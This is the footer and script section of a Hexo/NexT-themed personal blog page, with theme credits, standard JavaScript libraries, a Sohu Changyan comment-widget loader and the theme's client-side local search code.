  <span class="author" itemprop="copyrightHolder">Vicen</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  




  
    <script type="text/javascript">
    (function(){
      var appid = 'cytkWHfbK';
      var conf = 'bcb28f4ece95ff2018c1f67cae138d36';
      var width = window.innerWidth || document.documentElement.clientWidth;
      if (width < 960) {
      window.document.write('<script id="changyan_mobile_js" charset="utf-8" type="text/javascript" src="https://changyan.sohu.com/upload/mobile/wap-js/changyan_mobile.js?client_id=' + appid + '&conf=' + conf + '"><\/script>'); } else { var loadJs=function(d,a){var c=document.getElementsByTagName("head")[0]||document.head||document.documentElement;var b=document.createElement("script");b.setAttribute("type","text/javascript");b.setAttribute("charset","UTF-8");b.setAttribute("src",d);if(typeof a==="function"){if(window.attachEvent){b.onreadystatechange=function(){var e=b.readyState;if(e==="loaded"||e==="complete"){b.onreadystatechange=null;a()}}}else{b.onload=a}}c.appendChild(b)};loadJs("https://changyan.sohu.com/upload/changyan.js",function(){
        window.changyan.api.config({appid:appid,conf:conf})});
      }
    })();
    </script>
    <script type="text/javascript" src="https://assets.changyan.sohu.com/upload/plugins/plugins.count.js"></script>
  









  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
